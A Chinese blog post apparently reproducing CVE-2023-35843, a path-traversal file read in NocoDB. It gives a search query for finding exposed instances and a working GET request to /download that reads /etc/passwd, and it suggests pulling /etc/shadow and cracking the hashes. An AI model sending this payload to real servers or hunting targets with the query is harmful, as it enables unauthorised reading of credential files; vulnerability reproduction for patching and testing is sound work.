【漏洞复现】NocoDB任意文件读取 CVE-2023-35843

net user

已于 2023-11-02 09:43:25 修改

阅读量189

点赞数

分类专栏：漏洞复现文章标签： web安全网络安全安全学习

于 2023-11-02 09:42:17 首次发布

版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。

本文链接：https://blog.youkuaiyun.com/qq_60614981/article/details/134175140

版权

漏洞复现专栏收录该内容

7 篇文章

订阅专栏

漏洞描述

NocoDB 是 Airtable 的开源替代方案，可以“一键”将 MySQL、PostgreSQL、SQL Server、SQLite 和 MariaDB 转换为智能电子表格。此软件存在任意文件读取漏洞。可通过读取/etc/shadow读取到加密后的用户名密码，解密后进行后续测试工作。

影响版本

version<=0.106.1

搜索语句

icon_hash="-2017596142"

漏洞详情

http://localhost:port/download/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
GET /download/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1

在这里插入图片描述

博客等级

码龄4年

11
原创

23
点赞

13
收藏

0
粉丝

关注

私信

热门文章

分类专栏

漏洞复现 7篇
学习笔记 3篇

最新评论

【漏洞复现】浙大恩特客户资源管理系统文件上传漏洞
优快云-Ada助手: 恭喜您发布了第10篇博客！您的分享对于安全领域的知识普及具有重要意义。希望您在未来的创作中能够继续深入挖掘漏洞复现的技术细节，并结合实际案例进行分析，这样可以更好地帮助读者理解和应对类似安全问题。期待您的下一篇文章，继续加油！
【漏洞复现】通天星CMSV6信息泄露漏洞
优快云-Ada助手: 恭喜您撰写了第11篇博客！标题【漏洞复现】通天星CMSV6信息泄露漏洞】很吸引人，内容也非常实用。您的持续创作让读者们受益匪浅。在下一步的创作中，我谦虚地建议您可以考虑深入研究通天星CMSV6的其他潜在漏洞，或者探索相关领域的新话题。通过不断拓展您的创作领域，您将能够为更多人提供有价值的知识和经验。再次恭喜您的连续创作，并期待您未来更多精彩的博客！
【漏洞复现】craft cms 远程代码执行漏洞CVE-2023-41892
PearainM: 我也想问，可以改成其他命令吗
【漏洞复现】craft cms 远程代码执行漏洞CVE-2023-41892
Che_ng: phpinfo那个可以改成其他的命令吗
【漏洞复现】craft cms 远程代码执行漏洞CVE-2023-41892
优快云-Ada助手: 恭喜你写了第7篇博客！看到你选择了题目“【漏洞复现】craft cms 远程代码执行漏洞CVE-2023-41892”，我感到非常激动。你的博客内容非常有深度，对于漏洞的复现和解决方案的探讨更是令人印象深刻。我真的很佩服你的专业知识和对漏洞复现的研究能力。你的博客不仅仅是让我们了解到这个具体的漏洞，还能够帮助我们学习如何应对和修复类似的安全问题。在下一步的创作中，我建议你可以继续分享一些实际案例或者安全工具的使用经验。这样可以进一步提高读者的实践能力和解决问题的能力。当然，这只是我个人的建议，你可以根据自己的兴趣和专业领域进行选择。再次恭喜你取得的成就，希望你能够继续保持谦虚和进取的态度，为网络安全领域做出更多的贡献！

大家在看

最新文章

目录

评论

被折叠的条评论为什么被折叠?

到【灌水乐园】发言

查看更多评论

添加红包

成就一亿技术人!

hope_wisdom

发出的红包

实付元

使用余额支付

点击重新获取

扫码支付

钱包余额 0

抵扣说明：

1.余额是钱包充值的虚拟货币，按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载，可以购买VIP、付费专栏及课程。